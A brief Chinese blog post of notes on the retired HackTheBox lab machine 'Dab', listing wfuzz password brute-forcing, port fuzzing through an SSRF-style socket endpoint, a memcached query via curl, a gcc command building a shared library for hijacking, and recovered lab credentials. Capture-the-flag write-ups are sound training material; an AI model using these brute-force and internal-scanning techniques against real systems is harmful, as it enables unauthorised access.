HTB-靶机-Dab

本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关

靶机是作者购买VIP使用退役靶机操作,显示IP地址为10.10.10.86

本次使用https://github.com/Tib3rius/AutoRecon 进行自动化全方位扫描

执行命令 autorecon 10.10.10.86 -o ./Dab-autorecon

可能用到的知识点

进行模糊爆破密码
wfuzz -c --hl=18 -w /usr/share/seclists/Passwords/darkweb2017-top1000.txt -d 'username=admin&password=FUZZ&submit=Login' http://10.10.10.86/login

admin:Password1

wfuzz -u http://10.10.10.86:8080/ -w /usr/share/seclists/Passwords/darkweb2017-top1000.txt --hh 324 -b password=FUZZ

secret

探测可能开放的端口
wfuzz -c -z range,1-65535 -u 'http://10.10.10.86:8080/socket?port=FUZZ&cmd=bmfx' -H "Cookie: password=secret" --hc=500

login: genevieve   password: Princess1

gcc -shared -fPIC /dev/shm/bmfx.c -o /dev/shm/libseclogin.so

s3cur3l0g1n

curl -s 'http://10.10.10.86:8080/socket?port=11211&cmd=get users' -H "Cookie: password=secret" | recode html..ascii | sed -n '/VALUE/{:a;n;/END/b;p;ba}' | jq .
本靶机通过上述命令和burpsuite重放都没法获取用户名和加密的hash,原因未知,重置过靶机也是一样的情况,根据网上的资料直接跳过过程,拿去到flag,本靶机不做记录

参考:
https://0xdf.gitlab.io/2019/02/02/htb-dab.html

 

posted @ 2020-12-14 14:08  皇帽讲绿帽带法技巧  阅读(110)  评论(0编辑  收藏  举报